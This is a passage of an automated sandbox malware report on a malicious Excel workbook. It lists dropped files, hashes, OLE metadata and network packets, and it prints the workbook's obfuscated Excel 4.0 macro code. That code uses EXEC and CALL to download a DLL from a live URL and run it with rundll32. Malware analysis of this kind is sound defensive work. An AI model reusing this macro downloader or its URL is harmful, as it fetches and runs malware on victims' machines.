                • 162.241.148.243
                Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                • 192.232.249.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                document-1251000362.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                catalogue-41.xlsbGet hashmaliciousBrowse
                • 108.167.180.111
                documents-1660683173.xlsmGet hashmaliciousBrowse
                • 192.185.56.250
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                06iKnPFk8Y.dllGet hashmaliciousBrowse
                • 162.241.54.59
                ddff.exeGet hashmaliciousBrowse
                • 108.179.235.108
                PowerShell_Input.ps1Get hashmaliciousBrowse
                • 162.241.61.203
                New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                • 192.185.122.118
                Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                • 162.241.148.243
                document-1848152474.xlsmGet hashmaliciousBrowse
                • 192.185.48.186
                7z7Q51Y8Xd.dllGet hashmaliciousBrowse
                • 162.241.54.59
                pySsaGoiCT.dllGet hashmaliciousBrowse
                • 162.241.54.59
                QOpv1PykFc.dllGet hashmaliciousBrowse
                • 162.241.54.59
                S4caD0RhXL.dllGet hashmaliciousBrowse
                • 162.241.54.59

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbxSecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                    SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                      C:\Users\user\sdbybsd.fdsSecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                          SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:downloaded
                            Size (bytes):688241
                            Entropy (8bit):7.064532901692121
                            Encrypted:false
                            SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                            MD5:7DF0611CD75FA4C02B29070728C37247
                            SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                            SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                            SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 22%, Browse
                            • Antivirus: Metadefender, Detection: 5%, Browse
                            • Antivirus: ReversingLabs, Detection: 2%
                            Joe Sandbox View:
                            • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                            Reputation:low
                            IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\7BBE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):67964
                            Entropy (8bit):7.879577385154599
                            Encrypted:false
                            SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF708e:LqeRrW2JyW32AiHD2sTU2yF709
                            MD5:A8277AE08A00AFC47C725FB7151E19E3
                            SHA1:B6AD494C2118AD8359866EC834D0BA273506C94F
                            SHA-256:8362EFE7B14628196417DA547779C1668BDECC4BBC37E84D0AAF4AF61421BCC7
                            SHA-512:49549CAA43DF189B9021CE9CFFA769A63A89248C9154903EB7173FE9DB55C5FEDD1255BC6A4233DD014D4DBE384478F5583C2745CD509B5AF50D0E70DF4524B8
                            Malicious:false
                            Reputation:low
                            Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                            Process:C:\Windows\SysWOW64\rundll32.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2178
                            Entropy (8bit):7.024556459201917
                            Encrypted:false
                            SSDEEP:48:Kb6U7R56fOgWh3czl7JQb6U7D6LHf+6snQvOKFY+87bqmt:Kb6QRZmzhJQb6QDe2pKFqV
                            MD5:58A921083296E0FD3025512CBAD7BEBC
                            SHA1:4885166BB85D9F90305D168E04B5A4DF3F41E596
                            SHA-256:CFAC2DC72B37737B32788D0C3AC1B95E1C48DC8BFEC98876D82EB6320ADF787E
                            SHA-512:14433A360E82BA3E4A6E9CE37236DD53F7456EAD009061D70B71CFDA6254703A96493B668796D1FAB3FC1F00D9079D48F118F5A79DF1C5000453736243F21915
                            Malicious:false
                            Reputation:low
                            Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O......y....h.A.#C.........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....E`.....uA./.......U>...................... ....A^Y........u..*`&!q...}./.k._o*......5a.}.P.L#2\E8......b`LDn\......TL.A*^..;.%....y...J..m.+,...&.7.`..Y..(..I...I....s4.U-..%..T.S~X....x..8........@o.C).44.....z|..Y.?k..q.......j.N.....Lo..w0.@.....J..'>-.......#@Q.[.+^'..].9X..6.....g7.Fg..si<..v.{....(-x..:V./_<.1...iYDW...{O...K.A8s...J....v.....&..GQI.k....Fq.$ly..gHJ9..qK.3..d....ve...xR..X1..~...E.H..m..-.iyr......eXx...ErQ.$N..lH...x...H.0..._N.V?...@...........^..=6F...+...X.W.[....{*.S..k...u.,.f6...n....../..~.6............z..O......y....h.A.#C.............E.x.p.o.r.t. .F.l.a.g....f...... .....d-..;....=o.....VYS.....h.G9............. .....U.0...
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 11:50:33 2021, atime=Wed Apr 7 11:50:33 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.487959229584415
                            Encrypted:false
                            SSDEEP:12:85QEcLgXg/XAlCPCHaXSzB8aB/yVU7UX+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP8:85hK/XTK6aMdYeQSDv3qIrNru/
                            MD5:0E11E63BAC993E1B743747D23F23610A
                            SHA1:5CCCBFF23FD96ADC6380767A4829DA0ADFA82EA4
                            SHA-256:6B42734BB2769A59AC73D85E63EE7A150F9491B1A8F1852F584F0666A3F84AC0
                            SHA-512:A9808C7954EE34A8A508DE39E1385083FF60869345431120A65A49300A6492A02298E04617DC0FC56BB74DF1CFEFAE6C535F94FB4645DA6E3B13E2DEDC7F3FC1
                            Malicious:false
                            Reputation:low
                            Preview: L..................F...........7G..`.$..+..`.$..+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RQf..Desktop.d......QK.X.RQf*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Trojan.Agent.FFFK.23764.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 7 11:50:20 2021, mtime=Wed Apr 7 11:50:33 2021, atime=Wed Apr 7 11:50:33 2021, length=92160, window=hide
                            Category:dropped
                            Size (bytes):2328
                            Entropy (8bit):4.591638833555375
                            Encrypted:false
                            SSDEEP:48:8B/XTZaHT8Hig1C5Hi4IQh2B/XTZaHT8Hig1C5Hi4IQ/:8B/X1aHgCl44IQh2B/X1aHgCl44IQ/
                            MD5:E9B16D312416710B760276522658F435
                            SHA1:928C06D16F71C9E76E72D9A21295352B9FDCBC6F
                            SHA-256:BBF5BCC7696C23684D7D1CABAB1C6F4DAA297CC0A89BA4774362DC9E2B0E3C69
                            SHA-512:BFB89340AE3CFCF4F097F9154119285032B43655A66E9208C2AE4DC59ABD48B48A197AC41ACC801124AC82369F07244D29AC028CB548C1D022864AE7E9820145
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... .......+..`.$..+....+..+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RKf..Desktop.d......QK.X.RKf*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......RNf .SECURI~1.XLS.........RKf.RKf*....&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...2.3.7.6.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...2.3.7.6.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):173
                            Entropy (8bit):4.969986660341752
                            Encrypted:false
                            SSDEEP:3:oyBVomM0b3kVG3ouscb3kVG3omM0b3kVG3ov:dj60gVG3VgVG360gVG3y
                            MD5:47537AFB9DEBE73D15C74E68538B4FF1
                            SHA1:A77F3C7C9F1954206C76EAFD93879BF078F1AC9D
                            SHA-256:424F8E77FCBA0ADF59E49D2B0D980DF2EA309C9DD21C2C3B44F2540336BC7170
                            SHA-512:D97C3870E7605637EF5BD4AE740A67B08F8394D43F630E1E20A3546AD5975A15D6EB0F565DFEDC522EC79AFE974DABEBDACE799FD1F569ACEF000A29051C9CE4
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.23764.LNK=0..SecuriteInfo.com.Trojan.Agent.FFFK.23764.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.23764.LNK=0..
                            C:\Users\user\Desktop\2CBE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16
                            Category:dropped
                            Size (bytes):127008
                            Entropy (8bit):7.230560164184499
                            Encrypted:false
                            SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSe2jTUqyF70mi+W2DzaErDzaE4I8rmj2:G8rmjAItyzElBIL6lECbgBvP5NmuCS9r
                            MD5:EA451112F1D8D41D155AAFB8D773343C
                            SHA1:F5BBB5528EC9876E2F264046F0501299288CBE77
                            SHA-256:24E44471DF7E4306096C440A869275FF1D5A8956111D6CA86F3262184801B62B
                            SHA-512:B58D51F006C59BC772709365990D99D98B70CE30F67235E6A6CFF38427DD9D57918A97D2BEC4383D012C5D7F98F8C06AB53F8A873003277D0D6554DAC6904FEA
                            Malicious:false
                            Reputation:low
                            Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                            C:\Users\user\sdbybsd.fds
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):688241
                            Entropy (8bit):7.064532901692121
                            Encrypted:false
                            SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                            MD5:7DF0611CD75FA4C02B29070728C37247
                            SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                            SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                            SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 22%, Browse
                            • Antivirus: Metadefender, Detection: 5%, Browse
                            • Antivirus: ReversingLabs, Detection: 2%
                            Joe Sandbox View:
                            • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                            Entropy (8bit):3.087349849990019
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls
                            File size:267776
                            MD5:73690262256f3a4872aaadb37acac4ed
                            SHA1:cd4327807142a8815c3a13a46ddb7abd8f23b32f
                            SHA256:2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76
                            SHA512:337844fd0357db123d607480c51044cd3d8005bfbfc17bd4ae50d7a055c126e7b4d23258068ed0d5ac7e77b6980ca67fda24b6e80c98c2ca1943a1d048cb2125
                            SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0e:Fhe
                            File Content Preview:........................>......................................................................................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-04-06 14:04:37
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.342986545458
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.247521269318
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8
                            Stream Size:255780
                            Entropy:3.03349063455
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Macro 4.0 Code

                            ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                            ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                            =HALT()

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 7, 2021 05:51:04.744469881 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:04.907798052 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:04.907898903 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:04.908396006 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.069098949 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299613953 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299679041 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299716949 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299757004 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299799919 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299849033 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299885988 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299906015 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.299926043 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.299967051 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.300005913 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.300005913 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.300056934 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.310271978 CEST4916580192.168.2.22192.232.249.186
                            Apr 7, 2021 05:51:05.463424921 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.463486910 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.463525057 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.463565111 CEST8049165192.232.249.186192.168.2.22
                            Apr 7, 2021 05:51:05.463603973 CEST8049165192.232.249.186192.168.2.22
